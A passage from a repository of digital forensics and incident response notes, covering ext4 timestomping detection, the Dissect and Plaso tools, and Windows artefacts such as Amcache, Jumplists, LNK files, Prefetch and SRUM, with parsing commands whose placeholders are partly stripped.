25 | updated (in addition to the `mtime` timestamp). 26 | 27 | The `crtime`, for `creation time`, was introduced on Linux `ext4` partitions. 28 | This timestamp records the creation / birth time of a file or folder. 29 | 30 | ###### Timestomping on Linux systems 31 | 32 | Modification of files timestamps are generally conducted on Linux operating 33 | systems using the `touch` built-in utility. This utility can be used to set 34 | the `mtime` and `atime` timestamps of a file or folder to the current date, 35 | arbitrary values, or the timestamps of a file of reference. 36 | 37 | The `touch` utility only can be used to modify the `ctime` timestamp of a file 38 | or folder but only to the current system time. It is thus possible to modify 39 | the `ctime` timestamp of a file or folder by updating the current system time, 40 | using `touch` on the given file or folder, and resetting the system time back 41 | to its previous value. 42 | 43 | **The `crtime` timestamp of the file or folder is however not updatable by 44 | `touch`.** Modifying a file or folder `crtime` timestamp would require to 45 | access the disk image directly (using `debugfs` for example) which is not 46 | doable while the filesystem is mounted. 47 | 48 | Files or folders with `mtime` or `ctime` timestamps preceding their birth time 49 | (`crtime` timestamp) can thus be indicative of timestomping on `ext4` 50 | partitions. 51 | 52 | ### Detection of timestomping on ext4 partitions 53 | 54 | ```bash 55 | # Finds on which device reside the specified file or folder. 56 | df | (read a; read a b; echo "$a") 57 | 58 | # Returns the inode number of the specified file or folder. 59 | stat -c %i 60 | 61 | # Displays the crtime as well as the ctime, atime, and mtime timestamps of the specified file or folder. 62 | # Note that the <> surrounding the inode number are mandatory. 63 | debugfs -R 'stat <>' 64 | ``` 65 | -------------------------------------------------------------------------------- /DFIR/Tools/Dissect.md: -------------------------------------------------------------------------------- 1 | # DFIR - Tools - Dissect 2 | 3 | ### Overview 4 | 5 | [`Dissect`](https://github.com/fox-it/dissect) is a digital forensics & 6 | incident response Python toolset that allows access and parsing of forensic 7 | artefacts from various disk and file formats. 8 | 9 | ###### Dissect supported targets 10 | 11 | `Dissect` supports the [following targets](https://docs.dissect.tools/en/latest/overview/): 12 | 13 | - Raw disk images and evidence containers (`.E01`). 14 | 15 | - Virtual disks (`.vmdk`, `.vhdx`, etc.). 16 | 17 | - Virtual machine descriptor files (`.vmx`, `.vmcx`, etc.). By using a VM 18 | descriptor file, `dissect` will load the all the virtual disks associated 19 | with the VM. 20 | 21 | - Local live systems (`\\.\PhysicalDrive0`, `/dev/sda`, etc.). 22 | 23 | - `.tar` archives created by `acquire` 24 | 25 | - Directories, such as `KAPE` or `velociraptor` (`KapeTargets`) collection 26 | outputs. 27 | 28 | ###### Dissect tools 29 | 30 | `Dissect` is composed of the following tools: 31 | 32 | - [`acquire`](https://docs.dissect.tools/en/latest/tools/acquire.html): to 33 | gather forensic artifacts from disk images or the live system. 34 | 35 | - [`target-fs`](https://docs.dissect.tools/en/latest/tools/target-fs.html): 36 | to interact with the filesystem of a target, using a set of familiar Unix 37 | commands. 38 | 39 | - [`target-mount`](https://docs.dissect.tools/en/latest/tools/target-mount.html): 40 | to mount the filesystem of a target to an arbitrary directory on the 41 | analysis machine (similar to the `mount` utility). 42 | 43 | - [`target-query`](https://docs.dissect.tools/en/latest/tools/target-query.html): 44 | to parse data and artefacts from the specified target, mostly as `records` 45 | outputs. 46 | 47 | - [`target-reg`](https://docs.dissect.tools/en/latest/tools/target-reg.html): 48 | to tool query the registry of Windows targets. 49 | 50 | - [`rdump`](https://docs.dissect.tools/en/latest/tools/rdump.html): to 51 | interact and manipulate `dissect`'s `records` outputs. 52 | 53 | ###### Installation 54 | 55 | The `dissect` toolset can be easily installed through `Python3`'s `pip`: 56 | 57 | ```bash 58 | python3 -m pip install dissect 59 | python3 -m pip install acquire 60 | ``` 61 | 62 | ### acquire 63 | 64 | `acquire` can be used to extract artifacts either from the local system or the 65 | specified targets, and place the collected artefacts in a `tar` archive (or 66 | output folder). 67 | 68 | `acquire` supports three levels of profiles, that specify the artefacts that 69 | will be collected depending on the target operating system: `minimal`, 70 | `default`, and `full`. 71 | 72 | ```bash 73 | # OUTPUT_TYPE: tar or dir 74 | 75 | acquire -p -o [-ot ] 76 | ``` 77 | 78 | ### target-fs 79 | 80 | `target-fs` can be used to interact with the filesystem of a target, to list or 81 | copy individual or multiple files from the target to the analysis destination. 82 | 83 | ```bash 84 | target-fs 85 | 86 | target-fs cp -o 87 | ``` 88 | 89 | ### target-query 90 | 91 | `target-query` can be used to parse artefacts from the target, often (but not 92 | always) resulting in `dissect`'s `records` outputs. `target-query`'s `records` 93 | can be converted to `CSV` or `JSON` outputs as well as filtered with `rdump`. 94 | 95 | Multiple artefacts sources are implemented, as `target-query`'s `function`. The 96 | implemented functions can be listed using `target-query -l`. The following 97 | notable functions are implemented: 98 | 99 | - Windows operating systems: `activitiescache`, `amcache`, `lnk`, 100 | `evt` / `evtx`, `powershell_history`, `prefetch`, `recyclebin`, `registry` 101 | (`bam`, `shimcache`, etc.), `shellbags`, `shimcache`, `sru`, `ual`, 102 | `userassist`, etc. 103 | 104 | - Filesystem: `mft`, `usnjrnl`, `walkfs` 105 | 106 | - Linux / Unix operating systems: `bashhistory`, `cronjobs`, `dpkg`, `audit`, 107 | `btmp`, `lastlog`, `messages`, `services`, `ssh.authorized_keys`, 108 | `ssh.known_hosts`, `suid` 109 | 110 | - Web browsers: `browser.history` (Chrome, Firefox, Edge, and Internet Explorer 111 | histories) 112 | 113 | - remote access applications: `remoteaccess.remoteaccess` (AnyDesk and 114 | TeamViewer logs) 115 | 116 | - Yara scans: `yara` 117 | 118 | ```bash 119 | # Example: target-query windows_vm.vmdk -f mft 120 | target-query -f 121 | 122 | # Retrieves basic information about the target operating system. 123 | target-query -f hostname,domain,version,ips 124 | 125 | # Outputs the records as JSON (only for functions that return records). 126 | target-query -s --json -f 127 | 128 | # Uses rdump to transform the records outputs as CSV or JSON. 129 | # --multi-timestamp: deduplicate a record if it contains multiple timestamps to create a timeline. 130 | target-query [--multi-timestamp] -f | rdump <--csv | --json | --jsonlines> [--fields ] 131 | 132 | # Example Linux functions. 133 | target-query --multi-timestamp -f bashhistory,browser.history,capability_binaries,cronjobs,dpkg,audit,btmp,lastlog,messages,wtmp,services,ssh.authorized_keys,ssh.known_hosts,ssh.private_keys,suid 134 | ``` 135 | -------------------------------------------------------------------------------- /DFIR/Tools/README.md: -------------------------------------------------------------------------------- 1 | # DFIR - Collectors 2 | -------------------------------------------------------------------------------- /DFIR/Tools/plaso.md: -------------------------------------------------------------------------------- 1 | # DIFR - Tools - Plaso 2 | 3 | ### Overview 4 | 5 | [`Plaso`](https://github.com/log2timeline/plaso) is a Python-based engine used 6 | to generate ("super") timelines, based on a number of forensic artefacts. 7 | 8 | ### Usage 9 | 10 | ###### Plaso database generation 11 | 12 | The first step to generate a timeline through `plaso` is to create a `plaso` 13 | database using `log2timeline.py`. 14 | 15 | ```bash 16 | # Generates a plaso database, parsing all artefacts available. 17 | log2timeline.py --storage-file 18 | 19 | # Generates a plaso database through Docker, parsing all artefacts available. 20 | docker run -v : log2timeline/plaso log2timeline --storage-file / / 21 | 22 | # lists the available parsers. 23 | log2timeline.py --parsers list 24 | 25 | # Generates a plaso database, using all parsers except the filestat parser (useful for triaged data parsing). 26 | log2timeline.py --parsers '!filestat' --storage-file 27 | ``` 28 | 29 | The number of events parsed and errors that occurred during parsing can be 30 | reviewed with the `pinfo` script: 31 | 32 | ```bash 33 | pinfo.py 34 | ``` 35 | 36 | ###### Timeline generation 37 | 38 | Once a `plaso` database has been generated with `log2timeline`, the `psort` 39 | script can be used to transform the database in a human-readable timeline. 40 | Multiple output formats are supported, including `json`, `csv`, `TLN`, `xlsx`, 41 | `opensearch` database for ingestion with `Timesketch`, etc. 42 | 43 | `psort` uses UTC as its default time zone when outputting events. 44 | 45 | ```bash 46 | # Lists the supported output format. 47 | psort.py -o list 48 | 49 | # Generates a timeline in the specified format based on the provided Plaso database. 50 | psort.py -o -w 51 | ``` 52 | -------------------------------------------------------------------------------- /DFIR/Windows/Artefacts/Amcache.md: -------------------------------------------------------------------------------- 1 | # DFIR - Windows - Amcache 2 | 3 | **Windows DFIR notes are no longer maintained on InfoSec-Notes. Updated versions can be found on: [artefacts.help](https://artefacts.help/).** 4 | 5 | ### Overview 6 | 7 | Location: `%systemroot%\AppCompat\Programs\Amcache.hve` 8 | 9 | *`Amcache` is a replacement of the `RecentFileCache` (that was linked to DLL 10 | version `6.1.7600`).* 11 | 12 | Yield information related to **programs execution**. 13 | 14 | Very complex artefact, linked to an application compatibility feature that aim 15 | to maintain support of existing software to new versions of the Windows 16 | operating system (like the `Shimcache` artefact). `ProgramDataUpdater` (a task 17 | associated with the Application Experience Service) uses the registry file 18 | `Amcache.hve` to store data during process creation. The `Amcache` is a 19 | standalone registry hive, with multiple root keys that contain various types of 20 | data. 21 | 22 | The `Amcache` behavior depends on the version of the associated libraries, and 23 | not the version of the operating system. The `Amcache` on an up-to-date Windows 24 | 7 and Windows 10 will thus behave the same way. 25 | 26 | For a very comprehensive analysis of the `Amcache` artefact, and its evolution 27 | across different release of the underlying `DLL`, refer to the 28 | [ANSSI's ANALYSIS OF THE AMCACHE v2 white paper](https://www.ssi.gouv.fr/uploads/2019/01/anssi-coriin_2019-amcache_investigation.pdf). 29 | 30 | ### Information of interest 31 | 32 | The `Amcache.hve` registry hive is split in a number of root keys, with keys 33 | being added, changed, or removed depending on the `Amcache` `DLLs` versions. 34 | 35 | The following notable root keys can be of forensic interest: 36 | 37 | - `File` then `InventoryApplicationFile` starting from the version 38 | `10.0.14913.1002` of the `Amcache` libraries (`AmcacheParser` outputs 39 | `AssociatedFileEntries` and `UnassociatedFileEntries`): 40 | 41 | - Data about program executions if they are shimmed, programs part of an 42 | installed application, or programs part of scanned directories (with out 43 | requiring execution of the associated programs). 44 | 45 | - Data available (depending on the `Amcache` libraries version): executable 46 | full path, program size, **`SHA1` of the first 30MB of the executable** 47 | in the `FileId` value, binary type (x86 versus x64), the compilation date 48 | of the program in the `LinkDate` value. 49 | 50 | - Additional data for entries associated with an installed application is 51 | available in the `InventoryApplication` key. The `ProgramId` value 52 | from the `InventoryApplicationFile` subkey of a given program matches the 53 | subkey's name under the `InventoryApplication` key of the associated 54 | application. The `InventoryApplication` key provide metadata information 55 | about the application: name, publisher, install date, etc. 56 | 57 | - For non up-to-date systems still using a `File` key, the last write time 58 | of an entry key under the `File` key coincides with the execution time of 59 | an executable that is not associated to an application. For executables 60 | that are part of an application, the last write time coincides with 61 | either the application installation time or the first execution if the 62 | executable needed shimming. For entries under the 63 | newer `InventoryApplicationFile` key, the last write time of the keys 64 | always coincides with an execution of 65 | `Microsoft Compatibility Appraiser` and is thus no longer a timestamp of 66 | execution time. 67 | 68 | - `AmcacheParser`'s `AssociatedFileEntries` output references programs 69 | associated with an application and `UnassociatedFileEntries` output 70 | references "loose" programs (that are not associated with an installed 71 | application). 72 | 73 | - `InventoryDeviceContainer` and `InventoryDevicePnp` (`AmcacheParser` 74 | outputs ``DeviceContainers`` and `DevicePnp`): 75 | 76 | - Data about devices plugged in on the system. 77 | 78 | - Data available: device type (usb; Bluetooth, media, etc.), device 79 | friendly name, self reported description, manufacturer, associated 80 | driver, etc. 81 | 82 | - `InventoryDriverBinary` (`AmcacheParser` output `DriveBinaries`): 83 | 84 | - Data about installed drivers. 85 | 86 | - Data available: driver name, full path, size, associated service name, 87 | compilation timestamp (`DriverTimestamp`), driver file last write 88 | timestamp, etc. 89 | 90 | - `InventoryDriverPackage` (`AmcacheParser` output `DriverPackages`): 91 | 92 | - Data about drivers package file (INF file) that contains information 93 | about the driver. 94 | 95 | - Data available: driver package file name, path, last write timestamp, etc. 96 | 97 | - `Programs` then `InventoryApplication` (`AmcacheParser` output 98 | `ProgramEntries`): 99 | 100 | - Data about installed programs, as referenced in the `Uninstall` and / or 101 | a `Run` key of the `SOFTWARE` hive. 102 | 103 | - Data available: application name, executable full path and SHA1, 104 | publisher, install date, etc. 105 | 106 | - `InventoryApplicationShortcut` (`AmcacheParser` output `ShortCuts`): 107 | 108 | - Data about the shortcuts (`LNK` files) that were present at one time (and 109 | that may still be present or may have been removed) from a subset of 110 | scanned folders (Start Menu and / or Desktop folders). 111 | 112 | - Data available: full path of the shortcut. The last write timestamp of 113 | the associated subkey can also be a general indicator of when the 114 | activity occurred but does not seem to match any `MACB` timestamps of the 115 | shortcut file. 116 | 117 | ### Parsing 118 | 119 | The PowerShell cmdlet `Get-ForensicAmcache` of the `PowerForensics` suite 120 | can be used to parse the `Amcache.hve` registry hive. The `AmcacheParser`, 121 | supporting Windows 10, utility can be used to parse exported `Amcache.hve` 122 | registry hive. 123 | 124 | ``` 125 | # Deploy the PowerShell PowerForensics module 126 | .\PowerForensics.psd1 127 | Import-Module .\PowerForensics.psd1 128 | 129 | # Default to C:\Windows\AppCompat\Programs\Amcache.hve 130 | Get-ForensicAmcache | Out-File 131 | 132 | # From hive / mounted disk image 133 | Get-ForensicAmcache -HivePath "" | Out-File 134 | 135 | AmcacheParser.exe -f "" -i on --csv 136 | ``` 137 | -------------------------------------------------------------------------------- /DFIR/Windows/Artefacts/Jumplist.md: -------------------------------------------------------------------------------- 1 | # DFIR - Windows - Jumplist 2 | 3 | **Windows DFIR notes are no longer maintained on InfoSec-Notes. Updated versions can be found on: [artefacts.help](https://artefacts.help/).** 4 | 5 | ### Overview 6 | 7 | Location: 8 | 9 | - `AutomaticDestinations`: 10 | 11 | `%SystemDrive%:\Users\\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\.automaticDestinations-ms` 12 | 13 | Filename example: `590aee7bdd69b59b.automaticDestinations-ms` 14 | 15 | - `CustomDestinations`: 16 | 17 | `%SystemDrive%:\Users\\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\.customDestinations-ms` 18 | 19 | Filename example: `fb3b0dbfee58fac8.customDestinations-ms` 20 | 21 | 22 | Yield information related to **files and folders access**. 23 | 24 | Introduced in `Windows 7`, `Jumplists` are linked to a taskbar user 25 | experience-enhancing feature that allows users to "jump" to files, folders 26 | or others elements by right clicking on open applications in the `Windows 27 | taskbar`. The `Windows Explorer`'s `Quick Access` feature also stores entries 28 | in `Jumplists`. 29 | 30 | Two forms of `Jumplists` are created: 31 | - automatic entries for recently accessed items, stored in 32 | `*.automaticDestinations-ms` files. 33 | 34 | - custom entries in `*.customDestinations-ms` files for items manually 35 | "pinned" elements (by users or the applications themselves) to the 36 | `Windows taskbar` or an application's `Jumplist`. 37 | 38 | Each application `AutomaticDestinations` and `CustomDestinations` `JumpLists` 39 | information are thus stored in two unique and separated files, of different 40 | format: 41 | - `AutomaticDestinations` `JumpLists` files are stored as 42 | `AUTOMATICDESTINATIONS-MS` file, in the `MS OLE Structured Storage` format. 43 | This file format contains multiple streams, each stream composed of data 44 | similar to `shortcut files (.LNK)`. 45 | 46 | - `CustomDestinations` `JumpLists` are stored as `CUSTOMDESTINATIONS-MS` 47 | file, also assimilable to a series of `shortcut files`. 48 | 49 | ### Information of interest 50 | 51 | `JumpLists` hold information similar in nature to `shortcut files` for each 52 | file referenced in an application's `AutomaticDestinations` / 53 | `CustomDestinations` `JumpLists`: 54 | - the target file's **absolute path, size and attributes** (hidden, 55 | read-only, etc.). 56 | 57 | - the target file **`Modified, Access, and Created (MAC)` timestamps**, 58 | updated whenever the file is "jumped" to. 59 | 60 | - the **number of times the target file was "jumped" to**. 61 | 62 | As `JumpLists` are linked to an application, through an `AppId`, knowledge of 63 | the application that was used to open the files can be deducted if the 64 | application associated to the `AppId` is known. A number of `AppId` is 65 | documented in 66 | [`EricZimmerman` 's `JumpList` GitHub repository](https://github.com/EricZimmerman/JumpList/blob/master/JumpList/Resources/AppIDs.txt). 67 | 68 | Specific applications may define custom `JumpLists` entries that store 69 | information of forensic interest. For example, the `Google Chrome` and 70 | `Microsoft Edge` web browsers store the recently closed tabs in their 71 | respective `CustomDestinations` `JumpLists`. 72 | 73 | ### Parsing 74 | 75 | Eric Zimmerman's `JumpListExplorer.exe` and `JLECmd.exe` tools (`KAPE`'s 76 | `JLECmd` module) can be used to process `JumpLists` files. 77 | 78 | ``` 79 | # Parses the specified JumpLists file. 80 | JLECmd.exe [-q --csv ] -f 81 | 82 | # Recursively retrieves and parses the JumpLists files in the specified directory. 83 | JLECmd.exe [-q --csv ] -d \AppData\Roaming\Microsoft\Windows\Recent\ | C:\ | DIRECTORY> 84 | ``` 85 | 86 | -------------------------------------------------------------------------------- 87 | 88 | ### References 89 | 90 | https://www.youtube.com/watch?v=wu4-nREmzGM 91 | 92 | https://forensicswiki.xyz/page/LNK 93 | 94 | https://www.magnetforensics.com/blog/forensic-analysis-of-lnk-files/#:~:text=LNK%20files%20are%20a%20relatively,LNK%20extension 95 | -------------------------------------------------------------------------------- /DFIR/Windows/Artefacts/LNKFile.md: -------------------------------------------------------------------------------- 1 | # DFIR - Windows - shortcut files (.LNK) 2 | 3 | **Windows DFIR notes are no longer maintained on InfoSec-Notes. Updated versions can be found on: [artefacts.help](https://artefacts.help/).** 4 | 5 | ### Overview 6 | 7 | Location: 8 | 9 | - Automatically created `shortcut files`: 10 | 11 | `%SystemDrive%:\Users\\AppData\Roaming\Microsoft\Windows\Recent\*.lnk` 12 | 13 | - Additional likely locations of `shortcut files`: 14 | 15 | - Automatically created for documents opened using `Microsoft Office` 16 | products:
17 | `%SystemDrive%:\Users\\AppData\Roaming\Microsoft\Office\Recent\*.lnk` 18 | 19 | - On the users' `Desktop`:
20 | `%SystemDrive%:\Users\\Desktop` 21 | 22 | - in the `Startup folders`:
23 | `%SystemDrive%:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp`
24 | `%SystemDrive%:\Users\\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup` 25 | 26 | Yield information related to **files and folders access**. 27 | 28 | `Shortcut files (*.lnk)` are `Windows Shell Items` that reference to an 29 | original file, folder, or application. The effect of double-clicking a 30 | `shortcut file` is intended to be the same as double-clicking the application 31 | or file to which it refers. In addition, command line parameters and the folder 32 | in which the target should be opened can be specified in the shortcut. The 33 | `shortcut files` have a magic number of `0x4C` (`4C 00 00 00`). 34 | 35 | While `shortcut files` can be created manually, the Windows operating system 36 | also creates `shortcut files` under numerous user activities, such as opening 37 | of a non-executable file. For instance, a `shortcut file` is created under 38 | `[...]\AppData\Roaming\Microsoft\Windows\Recent\` whenever a file is opened 39 | from the `Windows Explorer`. `Shortcut files` created in such circumstances are 40 | referenced in the 41 | `NTUSER.DAT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs` 42 | registry keys. 43 | 44 | The `shortcut files` format is also used for entries within the 45 | `AutomaticDestinations` and `CustomDestinations` `JumpLists` files (introduced 46 | in `Windows 7`). For more information on the `JumpLists` files, refer to the 47 | `[DFIR] Windows - Artefacts - Jumplist` note. 48 | 49 | ### Information of interest 50 | 51 | As the `shortcut files` are not automatically deleted if the target file is 52 | deleted, they can be a source of historical information. 53 | 54 | The `shortcut files` yield the following information of forensic interest: 55 | - the **target file's absolute path, size and attributes** (hidden, 56 | read-only, etc.). The size and attributes are updated at each access to the 57 | target file (that induce an update to the `shortcut file`). 58 | 59 | - the **target file and the `shortcut file`** (source) itself **`Modified, 60 | Access, and Created (MAC)` timestamps at the time of the last access to the 61 | target file**. 62 | 63 | - whether the **target file was stored locally or on a remote network share** 64 | through the specification of a `LocalPath` or `NetworkPath`. 65 | 66 | - occasionally **information on the volume that stored the target file**: 67 | drive type (fixed vs removable storage media), serial number, and label / 68 | name if any. 69 | 70 | - occasionally **information on the host on which the shortcut file is 71 | present**: system's NetBIOS hostname and MAC address. 72 | 73 | The `source timestamps` stored in the `shortcut file`, as well as the 74 | **`Creation` and `Modification timestamps` of the shortcut file itself**, will 75 | also usually respectively indicate when the **target file was first and last 76 | opened**. 77 | 78 | ### Parsing 79 | 80 | Eric Zimmerman's `LECmd.exe` tool (`KAPE`'s 81 | `LECmd` module) can be used to process `shortcut files`. 82 | 83 | ``` 84 | # Parses the specified shortcut file. 85 | LECmd.exe [-q --csv ] -f 86 | 87 | # Recursively retrieves and parses the shortcut files in the specified directory. 88 | LECmd.exe [-q --csv ] -d \AppData\Roaming\Microsoft\Windows\Recent\ | C:\ | DIRECTORY> 89 | ``` 90 | 91 | -------------------------------------------------------------------------------- 92 | 93 | ### References 94 | 95 | https://www.youtube.com/watch?v=wu4-nREmzGM 96 | https://forensicswiki.xyz/page/LNK 97 | https://www.magnetforensics.com/blog/forensic-analysis-of-lnk-files/#:~:text=LNK%20files%20are%20a%20relatively,LNK%20extension 98 | -------------------------------------------------------------------------------- /DFIR/Windows/Artefacts/MISC.md: -------------------------------------------------------------------------------- 1 | # DFIR - Windows - MISC 2 | 3 | **Windows DFIR notes are no longer maintained on InfoSec-Notes. Updated versions can be found on: [artefacts.help](https://artefacts.help/).** 4 | 5 | ### NTFS file attributes 6 | 7 | A number of forensic artefact files, such as the `$MFT` or the `$UsnJrnl` 8 | files, have both the `NTFS` `Hidden (H)` and `System (S)` attributes set. The 9 | `System` attribute is used to identify system-critical files that are 10 | "necessary for Windows to operate properly" and are not shown by the Windows 11 | Explorer application or the `dir` utility by default. 12 | 13 | Following a collect of these files, that may be locked by Windows and require 14 | utilities such as `Velociraptor` or `KAPE` for triage, the files will remain 15 | hidden. The `attrib.exe` utility can be used to remove the `Hidden (H)` / 16 | `System (S)` attributes: 17 | 18 | ``` 19 | # Shows the specified file or files in the working directory NTFS attributes. 20 | attrib [] 21 | 22 | # Removes the Hidden and System attributes from the specified file. 23 | attrib -h -s 24 | ``` 25 | 26 | Alternatively, hidden / system files can be displayed in the Windows Explorer 27 | application (View -> Check "Hidden Items") or with `dir` utility / 28 | `Get-ChildItem` cmdlet the if needed: 29 | 30 | ``` 31 | dir /x /a 32 | 33 | Get-ChildItem -Attributes Hidden,!Hidden 34 | ``` 35 | -------------------------------------------------------------------------------- /DFIR/Windows/Artefacts/Outlook_files.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Qazeer/InfoSec-Notes/9340c61f285ec85e329b3bafdad724e0aa69e8f0/DFIR/Windows/Artefacts/Outlook_files.md -------------------------------------------------------------------------------- /DFIR/Windows/Artefacts/Prefetch.md: -------------------------------------------------------------------------------- 1 | # DFIR - Windows - Prefetch artefacts 2 | 3 | **Windows DFIR notes are no longer maintained on InfoSec-Notes. Updated versions can be found on: [artefacts.help](https://artefacts.help/).** 4 | 5 | ### Overview 6 | 7 | Location: `%systemroot%\Prefetch\-.pf` 8 | Filename example: `POWERSHELL.EXE-022A1004.pf` 9 | 10 | Yield Information related to **programs execution**. 11 | 12 | **Not present by default on Windows Server Operating Systems.** 13 | 14 | `Windows Prefetch` is a performance enhancement feature that enables 15 | prefetching of applications to make system boots or applications startups 16 | faster. `Prefetch` files are created whenever a program is executed from a 17 | specific path. If the same binary is executed from different locations, 18 | separate `Prefetch` files will be created for each different location. 19 | A `Prefetch` file can be created even if the executable did not successfully 20 | run. 21 | 22 | Whether the `Prefect` feature is enabled is configured by the 23 | `EnablePrefetcher` registry key: 24 | - `0` / undefined: disabled (default on Windows Server Operating Systems). 25 | - `0x1`: Partially enabled (application prefetching only). 26 | - `0x2`: Partially enabled (boot prefetching only). 27 | - `0x3`: Enabled (application and boot prefetching). 28 | 29 | ### Information of interest 30 | 31 | `Prefetch` files are not automatically deleted if the related executable is 32 | deleted and can thus be a source of historical information. However, as the 33 | `Prefetch` directory is limited to 128 entries on `Windows XP` to `Windows 7` 34 | and 1024 entries starting from `Windows 8`, Prefetch files may be overwritten 35 | and information lost. 36 | 37 | The `Prefecth` filenames are based on the executed program name and a hash, 38 | computed using a proprietary algorithm and based on the full path (and 39 | for some binaries, such as `dllhost.exe` or `svchost.exe`, command line 40 | parameters) of the executed program. 41 | 42 | The `Prefecth` files can yield the following information of forensic interest: 43 | - The file name and size of the binary executed. 44 | - The first and, starting from Windows 8, last eight executions timestamps. 45 | - The `Prefecth` file `NTFS` created and last modified timestamps also 46 | indicate the first and last time the program was executed. 47 | - Run count (number of time the binary was executed). 48 | - List of files and directories accessed during the first ten seconds of 49 | execution (including the eventual `DLL` loaded). 50 | The full path to executable file can often be determined from the list of 51 | files accessed (duplicate possible if a given binary access another binary 52 | with the same name). 53 | 54 | Note that the `Prefecth` files can be easily deleted, potentially invalidating 55 | the trace of execution and timestamps (notably of first execution). 56 | 57 | *Prefecth files indirect information* 58 | 59 | The creation or modification of `Prefecth` files observed in others artefacts 60 | (`$MFT`, `UsnJrnl`, etc.) reflect an execution of the binary linked to the 61 | `Prefecth` file (and whose name can be deducted from the `Prefecth` filename). 62 | 63 | *Prefecth information related to PowerShell execution* 64 | 65 | The `POWERSHELL.EXE-[...].pf` Prefetch file may contain references to 66 | recently executed PowerShell scripts. For an entry to be created in the 67 | Prefetch file, the given script must be executed within the first ten seconds 68 | of the `powershell.exe` execution. 69 | 70 | The accessed file list does retain entries from previous instances of a program 71 | execution. Accessed files information may thus persist through `powershell.exe` 72 | subsequent runs. 73 | 74 | ### Parsing 75 | 76 | Eric Zimmerman's `PECmd.exe` tool (`KAPE`'s `PECmd` module) can be used to 77 | parse `Prefecth` file(s): 78 | 79 | ``` 80 | # Parses the specified Prefecth file. 81 | PECmd.exe [-q --csv ] -f 82 | 83 | # Recursively retrieves and parses the Prefecth files in the specified directory. 84 | PECmd.exe [-q --csv ] -d 85 | ``` 86 | -------------------------------------------------------------------------------- /DFIR/Windows/Artefacts/RecentFilecache.md: -------------------------------------------------------------------------------- 1 | ### RecentFilecache 2 | 3 | **Windows DFIR notes are no longer maintained on InfoSec-Notes. Updated versions can be found on: [artefacts.help](https://artefacts.help/).** 4 | 5 | Location: `%systemroot%\AppCompat\Programs\RecentFileCache.bcf` 6 | 7 | Only Windows 7 and Windows Server 2008 R2. 8 | -------------------------------------------------------------------------------- /DFIR/Windows/Artefacts/RecycleBin.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Qazeer/InfoSec-Notes/9340c61f285ec85e329b3bafdad724e0aa69e8f0/DFIR/Windows/Artefacts/RecycleBin.md -------------------------------------------------------------------------------- /DFIR/Windows/Artefacts/SRUM.md: -------------------------------------------------------------------------------- 1 | # DFIR - Windows - System Resource Usage Monitor (SRUM) 2 | 3 | **Windows DFIR notes are no longer maintained on InfoSec-Notes. Updated versions can be found on: [artefacts.help](https://artefacts.help/).** 4 | 5 | ### Overview 6 | 7 | Introduced in Windows 8. 8 | 9 | Location: 10 | 11 | - `SRUM` database: `%SystemRoot%\System32\SRU\SRUDB.dat`. 12 | 13 | - (Optional) `SOFTWARE` (`%SystemRoot%\System32\config\SOFTWARE`) registry 14 | hive to translate some information in the database (user `SID` to username 15 | and network interfaces information notably). 16 | 17 | Yield information related to the system usage, including **programs execution** 18 | and **executed programs' network usage**. **Historical data only for the 19 | last 30 to 60 days** is stored in the `SRUM` database. 20 | 21 | Entries are not associated with their timestamp of occurrence but with the 22 | timestamp of insertion in the `SRUM` database. As entries are only written to 23 | the `SRUM` database every hour, timestamps are thus precise to the hour (with 24 | multiple entries usually sharing the same insertion timestamp). 25 | 26 | The `System Resource Usage Monitor (SRUM)` is a feature that records numerous 27 | metrics of system activities. Among the various information stored, the 28 | following two tables hold the most commonly valuable data for forensics 29 | investigations: 30 | 31 | - `Application Resource Usage` table (GUID 32 | `{D10CA2FE-6FCF-4F6D-848E-B2E99266FA89}`), that tracks programs 33 | execution. 34 | For each entry in the `Application Resource Usage` table (`SrumECmd`'s 35 | `AppResourceUseInfo` output), the following information may be recorded: 36 | - Timestamp of the `SRUM` entry creation. 37 | - Full path of the executable or application information / description for 38 | built-in components. 39 | - User `SID` of the user executing the process. 40 | - Metrics on CPU usage (CPU time in foreground and background). 41 | - Metrics on I/O operations (foreground / background number of read / write 42 | operations and bytes read / written). 43 | 44 | - `App Timeline Provider` table (GUID 45 | `{5C8CF1C7-7257-4F13-B223-970EF5939312}`), that also tracks programs 46 | execution. 47 | For each entry in the `Application Resource Usage` table (`SrumECmd`'s 48 | `AppTimelineProvider` output), the following information may be recorded: 49 | - Timestamp of the `SRUM` entry creation. 50 | - Name of the executable and description for built-in components. 51 | - Timestamp of compilation of the executable. 52 | - User `SID` of the user executing the process. 53 | - Timestamp of seemingly approximate end of execution. 54 | - Total duration of execution (in milliseconds). 55 | 56 | - `Network Data Usage` table (GUID `{973F5D5C-1D90-4944-BE8E-24B94231A174}`), 57 | that tracks programs execution and network usage of the executed 58 | programs. 59 | For each entry in the `Network Data Usage` table (`SrumECmd`'s 60 | `NetworkUsages` output), the following information may be 61 | recorded: 62 | - Timestamp of the `SRUM` entry creation. 63 | - Full path of the executable or application information / description for 64 | built-in components. 65 | - Metrics on network data usage (bytes sent and receive on a given network 66 | interface). 67 | 68 | Some of the information recorded in the `SRUM` database be viewed using the 69 | Windows `Task Manager` ("App history" tab). 70 | 71 | More information on the tables in the `SRUM` database is referenced in the 72 | [`srum-dump`](https://github.com/MarkBaggett/srum-dump) project's 73 | [mapping file](https://github.com/MarkBaggett/srum-dump/blob/master/SRUM_TEMPLATE2.xlsx). 74 | 75 | ### Parsing 76 | 77 | ###### Repairing the SRUDB.dat database 78 | 79 | As the copied `SRUM` database will likely not be in a "clean state", the 80 | database will have to be repaired. This can be accomplished using the 81 | `esentutl` utility. It is recommended to make a copy of the `SRU` directory 82 | before repairing the database. 83 | 84 | ``` 85 | # The following commands should be executed in the directory containing the UAL database files. 86 | 87 | esentutl.exe /r sru /i 88 | 89 | esentutl.exe /p SRUDB.dat 90 | ``` 91 | 92 | ###### SrumECmd 93 | 94 | The `SrumECmd` utility (`KAPE`'s `SrumECmd` module) can parse and extract 95 | information from the `SRUDB.dat` database, and correlates information from the 96 | `SOFTWARE` registry hive. 97 | 98 | ``` 99 | # Parses the specified SRUM database, using the optionally provided SOFTWARE registry hive. 100 | SrumECmd.exe -f [-r ] --csv 101 | 102 | # Recursively look 